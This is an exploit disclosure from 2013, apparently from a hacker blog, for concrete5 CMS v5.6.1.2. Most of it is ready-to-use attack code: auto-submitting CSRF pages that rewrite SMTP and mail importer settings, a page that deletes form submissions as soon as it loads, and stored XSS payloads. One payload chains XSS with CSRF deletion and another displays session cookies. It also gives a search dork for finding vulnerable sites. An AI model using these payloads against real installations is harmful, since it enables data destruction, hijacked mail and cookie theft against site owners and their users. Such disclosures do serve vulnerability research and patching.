=============================================================
__ __ _ ___ _ __ ____
\ \ / / | | / _ \ (_) /_ | |___ \
___ \ V / _ __ | | | | | | _ | | __) | _ __
/ _ \ > < | '_ \ | | | | | | | | | | |__ < | '__|
| __/ / . \ | |_) | | | | |_| | | | | | ___) | | |
\___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_|
| |
|_| blackpentesters.blogspot.com
=============================================================
###########################################################################################
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities] #
# Date: [2013-6-9] #
# Exploit Author: [expl0i13r] #
# Vendor Homepage: [http://www.concrete5.org/] #
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/] #
# Version: [5.6.1.2] #
# Goole Dork: [Built with concrete5 - an open source CMS] #
# Tested on: [Windows] #
# Contact: expl0i13r@gmail.com #
###########################################################################################
Summary:
========
1. CSRF (Modify SMTP Settings)
2. CSRF (Modify Mail Importers Settings)
3. CSRF (Delete Form Results)
4. Stored XSS
1. CSRF (Modify SMTP Settings):
================================
concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities one of which allow an attacker
to modify "SMTP Settings" and "Send Mail Method" available at below URL :
Affected URL:
--------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/
----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update it, when Victim loads this page
----------------------------------------------------------------------------------------
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">
<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select">
<option value="">None</option>
<option value="SSL" selected="selected">SSL</option>
<option value="TLS">TLS</option></select>
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">
</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>
2. CSRF (Modify Mail Importer Settings)
=========================================
Below code exploits CSRF vulnerability which allows attacker to Edit and update "Importer Settings" details.
Affected URL :
---------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/
----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update them, when Victim loads this page
----------------------------------------------------------------------------------------
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name = "myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal">
<input type="hidden" name="miID" id="miID" value="1">
<input id="miEmail" type="text" name="miEmail" value="exploiter">
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text"> <input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">
<select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select">
<option value="" selected="selected">None</option>
</select>
<select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select">
<option value="1" selected="selected">Yes</option>
</select>
<select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select">
<option value="POP" selected="selected">POP</option>
</select>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>
3. CSRF (Delete Form Results)
===============================
Each Submissions available at "REPORTS" > "Form Results" page has static "qsID" assigned, using which attacker can delete submissions.
Ex.
---
When we install this CMS, "Contact Us" form by default available at URL : http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/
For above "Contact Form", qsID in my case is "1370626098", which can be found at url:
--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/
--------------------------------------------------------------------------------------
<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>
------------------------------------------------------------------------------------------------------
In order to exploit this CSRF, attacker must have "qsID" values, for which attacker needs to have at least Limited access to CMS.
Steps:
------
1. Attacker logs in to CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"
3. Gets Static "qsID" value from source code
4. Use "qsID" to create below CSRF exploit
Code:
-------
<html>
<head>
<script>
function delete()
{
# Delete Submissins "Contact Us" page
window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")
}
</script>
</head>
<body onload="delete()">
</body>
</html>
4. Multiple Stored XSS
=======================
concrete5 CMS also suffers from Stored XSS vulnerability, which can be used to "Delete Form Results"
everytime page is loaded.
Stored XSS-1
============
URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/
Vulnerable Parameter:
----------------------
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">
XSS-CSRF Payload:
------------------
"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>
Stored XSS-2:
=============
URL:
-----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/
Vulnerable Parameter:
----------------------
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">
Payload:
---------
"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>
##################################
# eXpl0i13r #
# ------------------------------ #
#|blackpentesters.blogspot.com |#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################
